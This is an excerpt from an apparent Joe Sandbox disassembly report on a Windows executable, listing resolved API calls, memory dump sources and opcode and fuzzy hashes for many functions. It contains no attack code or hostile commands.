                                                                        • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                        APIs
                                                                        • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                        • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                        • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                        • BeginPath.GDI32(?), ref: 0044723D
                                                                        • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Object$Select$BeginCreateDeletePath
                                                                        • String ID:
                                                                        • API String ID: 2338827641-0
                                                                        • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                        • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                        • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                        • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                        APIs
                                                                        • Sleep.KERNEL32(00000000), ref: 00434598
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                        • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CounterPerformanceQuerySleep
                                                                        • String ID:
                                                                        • API String ID: 2875609808-0
                                                                        • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                        • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                        • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                        • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                        • MessageBeep.USER32(00000000), ref: 00460C46
                                                                        • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                        • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                        • String ID:
                                                                        • API String ID: 3741023627-0
                                                                        • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                        • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                        • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                        • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteObjectWindow$Icon
                                                                        • String ID:
                                                                        • API String ID: 4023252218-0
                                                                        • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                        • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                        • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                        • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                        • String ID:
                                                                        • API String ID: 1489400265-0
                                                                        • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                        • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                        • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                        • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                        APIs
                                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                        • DestroyWindow.USER32(?), ref: 00455728
                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 1042038666-0
                                                                        • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                        • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                        • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                        • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 0041780F
                                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                        • __getptd.LIBCMT ref: 00417826
                                                                        • __amsg_exit.LIBCMT ref: 00417834
                                                                        • __lock.LIBCMT ref: 00417844
                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                        • String ID:
                                                                        • API String ID: 938513278-0
                                                                        • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                        • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                        • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                        • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                        APIs
                                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                        • String ID:
                                                                        • API String ID: 2403457894-0
                                                                        • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                        • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                        • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                        • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                        APIs
                                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                                        • __freefls@4.LIBCMT ref: 00415209
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                        • String ID:
                                                                        • API String ID: 4247068974-0
                                                                        • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                        • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                        • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                        • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: )$U$\
                                                                        • API String ID: 0-3705770531
                                                                        • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                        • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                        • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                        • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                        APIs
                                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                        • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                        • CoUninitialize.OLE32 ref: 0046E53D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                        • String ID: .lnk
                                                                        • API String ID: 886957087-24824748
                                                                        • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                        • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                        • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                        • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \
                                                                        • API String ID: 4104443479-2967466578
                                                                        • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                        • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                        • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                        • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \
                                                                        • API String ID: 4104443479-2967466578
                                                                        • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                        • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                        • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                        • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: \
                                                                        • API String ID: 4104443479-2967466578
                                                                        • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                        • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                        • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                        • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                        Strings
                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
